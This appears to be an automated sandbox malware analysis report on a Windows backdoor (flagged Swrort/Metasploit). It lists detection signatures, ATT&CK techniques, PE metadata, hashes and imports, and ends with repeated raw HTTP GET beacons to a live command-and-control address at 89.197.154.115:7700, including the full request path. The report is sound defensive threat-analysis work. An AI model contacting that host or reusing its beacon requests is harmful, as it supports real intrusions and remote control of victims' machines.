                    Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_00401877 pushad ; retf 0_2_00401A79
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_004070D9 push ebx; iretd 0_2_004070DD
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_004012DB push FFFFFFCAh; ret 0_2_00401308
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_00402779 push ebp; ret 0_2_0040277A
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_00405123 push edi; retn 0010h0_2_00405125
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_00401527 push esi; ret 0_2_00401528
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_004055C6 push edx; ret 0_2_004055C9
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_004017D1 pushad ; retf 0_2_00401A79
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_004079EC push eax; retf 0_2_004079ED
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_00401DFC push 00401450h; iretd 0_2_00401E0A
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_00403F92 push ebp; ret 0_2_00403F9A
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exeCode function: 0_2_004017BC pushad ; retf 0_2_00401A79
                    Source: DRVf7H9j4V.exeStatic PE information: section name: .text entropy: 7.017108244459124

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 63653 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 63654 -> 7700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 63655 -> 7700
                    Source: C:\Users\user\Desktop\DRVf7H9j4V.exe TID: 6108Thread sleep time: -45000s >= -30000sJump to behavior
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.0000000000777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%%,b
                    Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: DRVf7H9j4V.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    OS Credential Dumping1
                    Security Software Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
                    Software Packing
                    LSASS Memory1
                    Virtualization/Sandbox Evasion
                    Remote Desktop ProtocolData from Removable Media11
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                    DLL Side-Loading
                    Security Account Manager1
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                    Obfuscated Files or Information
                    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture111
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
                    Ingress Tool Transfer
                    Scheduled TransferData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    DRVf7H9j4V.exe82%ReversingLabsWin32.Backdoor.Swrort
                    DRVf7H9j4V.exe100%AviraTR/Patched.Gen2
                    DRVf7H9j4V.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kFtrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqDRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0DRVf7H9j4V.exefalse
                          unknown
                          http://www.apache.org/DRVf7H9j4V.exefalse
                            unknown
                            http://www.zeustech.net/DRVf7H9j4V.exefalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              89.197.154.115
                              unknownUnited Kingdom
                              47474VIRTUAL1GBtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1520612
                              Start date and time:2024-09-27 16:47:07 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:DRVf7H9j4V.exe
                              renamed because original name is a hash value
                              Original Sample Name:ef9e66020f10a61f05bc865b167248d5.exe
                              Detection:MAL
                              Classification:mal100.troj.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 86%
                              • Number of executed functions: 9
                              • Number of non-executed functions: 13
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: DRVf7H9j4V.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              89.197.154.115XkObGXcie5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 89.197.154.115:7700/XTFk
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              VIRTUAL1GBXwl3DsNmN2.exeGet hashmaliciousCobaltStrike, Metasploit, ReflectiveLoaderBrowse
                              • 89.197.154.115
                              Windows11.exeGet hashmaliciousMetasploitBrowse
                              • 193.117.208.101
                              Trial.batGet hashmaliciousEmpireBrowse
                              • 193.117.208.101
                              Ti1p9tvbSW.exeGet hashmaliciousMetasploitBrowse
                              • 89.197.154.116
                              NUBuymtQ4b.exeGet hashmaliciousMetasploitBrowse
                              • 89.197.154.116
                              ealpZ0zoQi.exeGet hashmaliciousMetasploitBrowse
                              • 89.197.154.116
                              pA826G7Zi6.exeGet hashmaliciousMetasploitBrowse
                              • 89.197.154.116
                              SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elfGet hashmaliciousUnknownBrowse
                              • 89.197.225.199
                              hwveg8aUBB.batGet hashmaliciousMetasploitBrowse
                              • 89.197.154.116
                              kurCc0UDBg.exeGet hashmaliciousMetasploitBrowse
                              • 89.197.154.116
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.320795398128895
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:DRVf7H9j4V.exe
                              File size:73'802 bytes
                              MD5:ef9e66020f10a61f05bc865b167248d5
                              SHA1:d17d15d3234e278a6110d1f23ea3369c5c68238c
                              SHA256:ec8e8680522e7ecb16043670512d860de1f5ee95b7c3cadb4b6612e92a21af77
                              SHA512:dd241344746df57562bcaded738acf032a4e6b1d969aabd5ce0fee2a132b730ab5a2ed3525d9f917ea108b26f8a1f94cec1fe003084a87e000805d9998dd5b24
                              SSDEEP:1536:IdySJofJXkkx6aplLfDogqZrDmxPOmHMZovycMb+KR0Nc8QsJq39:HSWJ6AdPq5uD/e0Nc8QsC9
                              TLSH:CE73BF8285C84426D192113D67723B77AEB4F5FA3312C2DA794CCDE5EBD18B0926A3C7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y...E...Y..TE...Y...F...Y...F...Y...Y...Y..TQ...Y...z...Y..._...Y..Rich.Y..................PE..L...[l.J...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x40acb7
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:
                              Time Stamp:0x4A186C5B [Sat May 23 21:36:27 2009 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:481f47bbb2c9c21e108d65f52b04c448
                              Instruction
                              aaa
                              std
                              salc
                              xchg eax, ebx
                              salc
                              cld
                              dec ecx
                              dec edx
                              xchg eax, edx
                              xchg eax, edx
                              aaa
                              std
                              dec eax
                              xchg eax, ebx
                              std
                              clc
                              aaa
                              cmc
                              inc eax
                              cmc
                              daa
                              inc ecx
                              xchg eax, ecx
                              inc eax
                              aaa
                              inc eax
                              dec eax
                              stc
                              aaa
                              inc ecx
                              cwde
                              cmc
                              std
                              inc eax
                              clc
                              cmc
                              wait
                              das
                              cwde
                              cmc
                              wait
                              lahf
                              stc
                              dec ebx
                              dec eax
                              cmc
                              lahf
                              salc
                              daa
                              std
                              dec ebx
                              inc ecx
                              xchg eax, ecx
                              inc edx
                              inc eax
                              dec ebx
                              stc
                              clc
                              nop
                              cdq
                              xchg eax, edx
                              aas
                              wait
                              inc ecx
                              lahf
                              xchg eax, ebx
                              xchg eax, edx
                              dec eax
                              dec ecx
                              lahf
                              daa
                              cmc
                              inc ecx
                              dec eax
                              clc
                              cld
                              inc ebx
                              dec ebx
                              inc ecx
                              xchg eax, ebx
                              lahf
                              dec ecx
                              dec eax
                              dec ecx
                              inc eax
                              cdq
                              dec edx
                              daa
                              lahf
                              inc ecx
                              cld
                              inc edx
                              xchg eax, ebx
                              cmc
                              aas
                              std
                              wait
                              xchg eax, edx
                              salc
                              aas
                              inc ebx
                              das
                              xchg eax, ecx
                              wait
                              inc edx
                              dec edx
                              std
                              salc
                              salc
                              dec ebx
                              cmc
                              inc ecx
                              dec edx
                              dec edx
                              aas
                              aas
                              clc
                              stc
                              std
                              dec ecx
                              stc
                              dec ecx
                              inc edx
                              inc edx
                              aas
                              stc
                              clc
                              cdq
                              wait
                              nop
                              xchg eax, ebx
                              salc
                              inc eax
                              jmp 00007F63A47FF584h
                              mov eax, dword ptr [ebp-04h]
                              dec esi
                              mov edi, edx
                              not al
                              mov ecx, dword ptr [ecx]
                              jnbe 00007F63A48092DCh
                              fdiv st(0), st(4)
                              pop ecx
                              dec dword ptr [ebx-763F97FEh]
                              call 00007F635705A2C1h
                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc76c0x78.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x7c8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xc1e00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xc0000x1e0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xa9660xb000be0895c261ed1f2c36850c00f27cbd88False0.8146750710227273data7.017108244459124IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0xc0000xfe60x100025d7ceee3aa85bb3e8c5174736f6f830False0.46142578125DOS executable (COM, 0x8C-variant)5.318390353744998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xd0000x705c0x4000283b5f792323d57b9db4d2bcc46580f8False0.25634765625Matlab v4 mat-file (little endian) d, numeric, rows 0, columns 04.407841023203495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x150000x7c80x1000c13a9413aea7291b6fc85d75bfcde381False0.197998046875data1.958296025171192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x150600x768dataEnglishUnited States0.40189873417721517
                              DLLImport
                              MSVCRT.dll_iob, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, __p___initenv, _XcptFilter, _exit, _onexit, __dllonexit, strrchr, wcsncmp, _close, wcslen, wcscpy, strerror, modf, strspn, realloc, __p__environ, __p__wenviron, _errno, free, strncmp, strstr, strncpy, _ftol, qsort, fopen, perror, fclose, fflush, calloc, malloc, signal, printf, _isctype, atoi, exit, __mb_cur_max, _pctype, strchr, fprintf, _controlfp, _strdup, _strnicmp
                              KERNEL32.dllPeekNamedPipe, ReadFile, WriteFile, LoadLibraryA, GetProcAddress, GetVersionExA, GetExitCodeProcess, TerminateProcess, LeaveCriticalSection, SetEvent, ReleaseMutex, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, CreateMutexA, GetFileType, SetLastError, FreeEnvironmentStringsW, GetEnvironmentStringsW, GlobalFree, GetCommandLineW, TlsAlloc, TlsFree, DuplicateHandle, GetCurrentProcess, SetHandleInformation, CloseHandle, GetSystemTimeAsFileTime, FileTimeToSystemTime, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToFileTime, SystemTimeToTzSpecificLocalTime, Sleep, FormatMessageA, GetLastError, WaitForSingleObject, CreateEventA, SetStdHandle, SetFilePointer, CreateFileA, CreateFileW, GetOverlappedResult, DeviceIoControl, GetFileInformationByHandle, LocalFree
                              ADVAPI32.dllFreeSid, AllocateAndInitializeSid
                              WSOCK32.dllgetsockopt, connect, htons, gethostbyname, ntohl, inet_ntoa, setsockopt, socket, closesocket, select, ioctlsocket, __WSAFDIsSet, WSAStartup, WSACleanup, WSAGetLastError
                              WS2_32.dllWSARecv, WSASend
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampSource PortDest PortSource IPDest IP
                              Sep 27, 2024 16:48:07.285060883 CEST497047700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:07.290663958 CEST77004970489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:07.290751934 CEST497047700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:07.290910006 CEST497047700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:07.296689987 CEST77004970489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:08.929980040 CEST77004970489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:08.930071115 CEST497047700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:08.930639029 CEST497047700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:08.935415030 CEST77004970489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:13.947911024 CEST497057700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:13.952990055 CEST77004970589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:13.953099012 CEST497057700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:14.034622908 CEST497057700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:14.039520025 CEST77004970589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:15.632065058 CEST77004970589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:15.632210970 CEST497057700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:15.632404089 CEST497057700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:15.637361050 CEST77004970589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:20.646162987 CEST497067700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:20.651185036 CEST77004970689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:20.651284933 CEST497067700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:20.651420116 CEST497067700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:20.656600952 CEST77004970689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:22.237344027 CEST77004970689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:22.237468004 CEST497067700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:22.237622976 CEST497067700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:22.242470980 CEST77004970689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:27.242530107 CEST497137700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:27.247556925 CEST77004971389.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:27.247736931 CEST497137700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:27.248523951 CEST497137700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:27.253443003 CEST77004971389.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:28.846395969 CEST77004971389.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:28.846558094 CEST497137700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:28.846669912 CEST497137700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:28.851411104 CEST77004971389.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:33.849343061 CEST497147700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:33.854461908 CEST77004971489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:33.854608059 CEST497147700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:33.854751110 CEST497147700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:33.859591961 CEST77004971489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:35.440608025 CEST77004971489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:35.440773010 CEST497147700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:35.440881014 CEST497147700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:35.445682049 CEST77004971489.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:40.443249941 CEST497157700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:40.448215008 CEST77004971589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:40.448355913 CEST497157700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:40.448544979 CEST497157700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:40.453278065 CEST77004971589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:42.068162918 CEST77004971589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:42.068270922 CEST497157700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:42.068398952 CEST497157700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:42.073319912 CEST77004971589.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:47.085689068 CEST497167700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:47.090668917 CEST77004971689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:47.090785027 CEST497167700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:47.095710039 CEST497167700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:47.100516081 CEST77004971689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:48.742861032 CEST77004971689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:48.742944956 CEST497167700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:48.745078087 CEST497167700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:48.750086069 CEST77004971689.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:53.755589008 CEST636537700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:53.760560989 CEST77006365389.197.154.115192.168.2.8
                              Sep 27, 2024 16:48:53.763885975 CEST636537700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:53.764013052 CEST636537700192.168.2.889.197.154.115
                              Sep 27, 2024 16:48:53.768867970 CEST77006365389.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:07.277578115 CEST77006365389.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:07.277687073 CEST636537700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:07.277825117 CEST636537700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:07.283054113 CEST77006365389.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:12.286906958 CEST636547700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:12.291991949 CEST77006365489.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:12.292115927 CEST636547700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:12.292284966 CEST636547700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:12.297576904 CEST77006365489.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:13.897751093 CEST77006365489.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:13.897838116 CEST636547700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:13.898063898 CEST636547700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:13.902849913 CEST77006365489.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:18.913669109 CEST636557700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:18.918634892 CEST77006365589.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:18.918781042 CEST636557700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:18.918940067 CEST636557700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:18.924060106 CEST77006365589.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:20.528995991 CEST77006365589.197.154.115192.168.2.8
                              Sep 27, 2024 16:49:20.529052973 CEST636557700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:20.533181906 CEST636557700192.168.2.889.197.154.115
                              Sep 27, 2024 16:49:20.538019896 CEST77006365589.197.154.115192.168.2.8
                              TimestampSource PortDest PortSource IPDest IP
                              Sep 27, 2024 16:48:51.121382952 CEST5357343162.159.36.2192.168.2.8
                              Sep 27, 2024 16:48:51.693257093 CEST53647611.1.1.1192.168.2.8
                              • 89.197.154.115:7700
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.84970489.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:07.290910006 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.84970589.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:14.034622908 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.84970689.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:20.651420116 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.84971389.197.154.11577004136C:\Users\user\Desktop\DRVf7H9j4V.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 16:48:27.248523951 CEST328OUTGET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                              Host: 89.197.154.115:7700
                              Connection: Keep-Alive
                              Cache-Control: no-cache


